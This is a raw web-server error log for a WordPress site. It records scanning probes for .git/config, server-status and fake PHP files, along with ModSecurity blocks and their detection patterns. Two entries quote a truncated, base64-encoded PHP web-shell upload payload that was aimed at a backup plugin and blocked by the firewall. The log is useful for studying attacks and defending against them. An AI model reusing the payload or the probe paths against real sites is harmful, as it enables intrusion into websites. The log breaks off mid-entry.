/home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 27 13:47:45.231377 2024] [:error] [pid 28909:tid 140501315409664] [client 37.221.92.10:46620] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jan 27 13:47:45.332188 2024] [:error] [pid 28996:tid 140501416122112] [client 37.221.92.10:46622] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jan 27 13:48:24.423997 2024] [:error] [pid 28911:tid 140501557040896] [client 37.221.92.10:46690] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jan 27 13:48:24.548684 2024] [:error] [pid 28911:tid 140501466478336] [client 37.221.92.10:46692] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 28 01:46:39.170395 2024] [autoindex:error] [pid 28996:tid 140501348980480] [client 173.224.119.245:56142] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 28 03:38:39.170262 2024] [ssl:warn] [pid 29651:tid 140365478389632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 03:38:47.391614 2024] [ssl:warn] [pid 29656:tid 140365478389632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 03:38:47.897999 2024] [ssl:warn] [pid 29656:tid 140365478389632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 03:38:49.743826 2024] [ssl:warn] [pid 29656:tid 140365478389632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 03:38:52.022427 2024] [ssl:warn] [pid 30071:tid 140045157816192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 03:39:00.221227 2024] [ssl:warn] [pid 30074:tid 140045157816192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 28 04:12:34.847105 2024] [autoindex:error] [pid 30093:tid 140044941498112] [client 185.241.208.235:58134] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jan 28 05:17:02.081065 2024] [autoindex:error] [pid 31002:tid 140044966676224] [client 154.12.224.194:58776] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jan 28 17:52:53.124944 2024] [:error] [pid 30093:tid 140044824196864] [client 5.188.62.174:42346] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZbbaxRlWHYuH0n8zaaTf3gAAAIk"] [Sun Jan 28 18:33:48.890378 2024] [autoindex:error] [pid 30093:tid 140044740269824] [client 45.79.126.246:42940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/wordpress/index.php [Sun Jan 28 18:33:51.809869 2024] [autoindex:error] [pid 30092:tid 140044824196864] [client 45.79.126.246:42944] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/wordpress/index.php 2024/01/29 02:22:37 [error] 29971#29971: *159709 access forbidden by rule, client: 54.234.148.1, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 29 03:44:35.051928 2024] [ssl:warn] [pid 30804:tid 140038231140224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 03:44:43.280736 2024] [ssl:warn] [pid 30806:tid 140038231140224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 03:44:43.704812 2024] [ssl:warn] [pid 30806:tid 140038231140224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 03:44:45.583797 2024] [ssl:warn] [pid 30806:tid 140038231140224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 03:44:47.965401 2024] [ssl:warn] [pid 31281:tid 140363506206592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 03:44:56.165767 2024] [ssl:warn] [pid 31284:tid 140363506206592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 29 04:55:59.206011 2024] [autoindex:error] [pid 31942:tid 140363323459328] [client 81.88.49.27:53432] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/fullscreen/index.php [Mon Jan 29 04:56:01.988309 2024] [autoindex:error] [pid 31942:tid 140363188647680] [client 81.88.49.28:53436] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/fullscreen/index.php [Tue Jan 30 03:27:33.199883 2024] [ssl:warn] [pid 1196:tid 140449553360768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 03:27:41.531248 2024] [ssl:warn] [pid 1199:tid 140449553360768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 03:27:42.080253 2024] [ssl:warn] [pid 1199:tid 140449553360768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 03:27:44.222557 2024] [ssl:warn] [pid 1199:tid 140449553360768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 03:27:46.485138 2024] [ssl:warn] [pid 1667:tid 139969981740928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 03:27:54.746238 2024] [ssl:warn] [pid 1683:tid 139969981740928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 30 16:34:59.040274 2024] [autoindex:error] [pid 1702:tid 139969603520256] [client 54.37.121.239:42180] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Jan 30 16:35:01.773805 2024] [autoindex:error] [pid 1702:tid 139969679054592] [client 54.37.121.239:42200] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php 2024/01/30 23:52:31 [error] 1647#1647: *192745 access forbidden by rule, client: 3.110.156.69, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 31 03:49:40.645972 2024] [ssl:warn] [pid 19423:tid 140446694434688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 03:49:48.919797 2024] [ssl:warn] [pid 19425:tid 140446694434688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 03:49:49.288192 2024] [ssl:warn] [pid 19425:tid 140446694434688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 03:49:51.042863 2024] [ssl:warn] [pid 19425:tid 140446694434688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 03:49:54.682015 2024] [ssl:warn] [pid 19872:tid 140473907431296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 03:50:08.069499 2024] [ssl:warn] [pid 19883:tid 140473907431296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 31 09:36:50.398349 2024] [:error] [pid 20071:tid 140473473623808] [client 85.239.237.116:33704] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 31 09:37:02.355197 2024] [:error] [pid 20071:tid 140473565943552] [client 85.239.237.116:33712] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 31 11:41:30.142295 2024] [autoindex:error] [pid 20250:tid 140473716291328] [client 64.23.135.220:36058] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/02/01 00:45:30 [error] 19823#19823: *211536 access forbidden by rule, client: 159.89.83.196, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/02/01 00:45:31 [error] 19823#19823: *211586 access forbidden by rule, client: 159.203.94.228, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/02/01 00:45:33 [error] 19823#19823: *211767 access forbidden by rule, client: 165.22.74.203, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/02/01 00:45:35 [error] 19823#19823: *211859 access forbidden by rule, client: 139.144.96.150, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/01 00:45:35 [error] 19823#19823: *211856 access forbidden by rule, client: 139.144.150.205, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Feb 01 00:45:35.796667 2024] [authz_core:error] [pid 20250:tid 140473716291328] [client 159.203.63.67:51686] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/01 00:45:36 [error] 19824#19824: *211904 access forbidden by rule, client: 134.122.89.242, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/01 00:45:40 [error] 19824#19824: *212033 access forbidden by rule, client: 159.203.63.67, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Feb 01 00:45:40.913406 2024] [authz_core:error] [pid 20073:tid 140473473623808] [client 137.184.150.232:51830] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Thu Feb 01 00:45:43.930077 2024] [authz_core:error] [pid 20250:tid 140473574336256] [client 146.190.98.165:51848] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/01 00:45:46 [error] 19823#19823: *212068 access forbidden by rule, client: 137.184.150.232, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Feb 01 00:45:49.682461 2024] [authz_core:error] [pid 20073:tid 140473456838400] [client 128.199.195.68:51880] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/01 00:45:49 [error] 19824#19824: *212089 access forbidden by rule, client: 146.190.98.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/02/01 00:45:56 [error] 19823#19823: *212108 access forbidden by rule, client: 128.199.195.68, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Feb 01 09:27:40.702702 2024] [:error] [pid 7591:tid 139714128467712] [client 143.198.214.42:60946] [client 143.198.214.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/js/jquery/jquery.min.js"] [unique_id "ZbuqXBRNrK6gGmfrmgYM9gAAAUw"] [Thu Feb 01 20:34:59.963549 2024] [autoindex:error] [pid 7591:tid 139714153645824] [client 203.112.72.51:47412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/media/index.php [Fri Feb 02 16:57:53.566414 2024] [authz_core:error] [pid 19349:tid 139817526408960] [client 143.110.156.182:49910] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Feb 02 16:57:54.105958 2024] [authz_core:error] [pid 19597:tid 139817777329920] [client 139.144.150.45:49914] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/02 16:57:56 [error] 19218#19218: *245610 access forbidden by rule, client: 143.110.156.182, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/02/02 16:57:57 [error] 19218#19218: *245613 access forbidden by rule, client: 139.144.150.45, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Feb 02 19:51:19.379139 2024] [authz_core:error] [pid 19597:tid 139817794115328] [client 137.184.150.232:55070] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/02 19:51:21 [error] 19217#19217: *248558 access forbidden by rule, client: 137.184.150.232, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Feb 02 21:17:27.428336 2024] [authz_core:error] [pid 19349:tid 139817593550592] [client 139.59.182.142:56056] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/02/02 21:17:30 [error] 19218#19218: *249242 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Feb 02 21:28:27.923278 2024] [autoindex:error] [pid 19597:tid 139817677477632] [client 91.134.248.192:56194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/index.php [Sat Feb 03 04:53:25.479218 2024] [autoindex:error] [pid 24697:tid 140408587777792] [client 45.141.215.86:35204] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/02/03 05:09:13 [error] 24023#24023: *254205 access forbidden by rule, client: 44.203.209.217, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Feb 03 16:56:48.793448 2024] [:error] [pid 28816:tid 140408495458048] [client 178.159.37.38:46690] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:o. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,base64_decode('PD9waHAgCgoKZWNobyAnPGI+IEtpbmcgUnhSIFdhcyAgSGVyZSBUaGlzIHNvbWUgRnJvbSBNeSBUb29sIDwvYj48L2JyPjxlbT5Pbmx5IEdJRiwgSlBHLCBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkLjwvZW0+PGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9ImZpbGVfanBnIiAvPiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIiAvPiAgPC9mb3JtPiAgPC9jZW50ZXI+PC90ZD48L3RyPiA8L3RhYmxlPjxicj4nOwoKaWYgKCFlbXB0eSAoJF9GSUxFU1snZmlsZV9..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "Zb62oIfksJp0f4q5nmwTLwAAAZU"] [Sat Feb 03 16:56:59.246969 2024] [:error] [pid 28816:tid 140408512243456] [client 178.159.37.38:46848] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:o. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,base64_decode('PD9waHAgCgoKZWNobyAnPGI+IEtpbmcgUnhSIFdhcyAgSGVyZSBUaGlzIHNvbWUgRnJvbSBNeSBUb29sIDwvYj48L2JyPjxlbT5Pbmx5IEdJRiwgSlBHLCBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkLjwvZW0+PGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9ImZpbGVfanBnIiAvPiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIiAvPiAgPC9mb3JtPiAgPC9jZW50ZXI+PC90ZD48L3RyPiA8L3RhYmxlPjxicj4nOwoKaWYgKCFlbXB0eSAoJF9GSUxFU1snZmlsZV9..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "Zb62q4fksJp0f4q5nmwTRAAAAZM"] [Sun Feb 04 13:05:16.194599 2024] [autoindex:error] [pid 22469:tid 140690059138816] [client 104.211.54.253:41410] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/assets/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/themes/twentytwentytwo/assets/fonts/index.php 2024/02/04 13:43:52 [error] 22427#22427: *277932 access forbidden by rule, client: 107.189.30.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/04 13:43:54 [error] 22428#22428: *277938 access forbidden by rule, client: 185.220.101.10, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Feb 04 21:23:23.136896 2024] [:error] [pid 20649:tid 140690042353408] [client 37.221.92.12:49024] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:23:23.231453 2024] [:error] [pid 20650:tid 140690025568000] [client 37.221.92.12:49026] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:25:02.286360 2024] [autoindex:error] [pid 20650:tid 140690101102336] [client 37.221.92.12:49218] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 04 21:25:25.809601 2024] [:error] [pid 20770:tid 140690050746112] [client 37.221.92.12:49258] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:25:26.537411 2024] [autoindex:error] [pid 20770:tid 140689991997184] [client 37.221.92.12:49262] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 04 21:25:27.621076 2024] [autoindex:error] [pid 20649:tid 140690008782592] [client 37.221.92.12:49266] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 04 21:25:39.436122 2024] [:error] [pid 20649:tid 140690092709632] [client 37.221.92.12:49294] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 04 21:25:39.544125 2024] [:error] [pid 20651:tid 140690050746112] [client 37.221.92.12:49296] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 04 21:26:16.637373 2024] [:error] [pid 20649:tid 140689941640960] [client 37.221.92.12:49368] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:26:17.096165 2024] [:error] [pid 20651:tid 140690084316928] [client 37.221.92.12:49370] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:27:58.507207 2024] [autoindex:error] [pid 20770:tid 140690000389888] [client 37.221.92.12:49556] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 04 21:28:16.555768 2024] [:error] [pid 20650:tid 140690084316928] [client 37.221.92.12:49600] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 04 21:28:17.363273 2024] [autoindex:error] [pid 20770:tid 140689916462848] [client 37.221.92.12:49604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 04 21:28:18.449701 2024] [autoindex:error] [pid 20651:tid 140690075924224] [client 37.221.92.12:49608] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 05 02:13:38.948353 2024] [autoindex:error] [pid 20770:tid 140690109495040] [client 91.134.248.235:54758] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wpeditimage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/wpeditimage/index.php [Mon Feb 05 11:38:00.593380 2024] [:error] [pid 665:tid 140195441665792] [client 104.167.222.126:37192] [client 104.167.222.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: 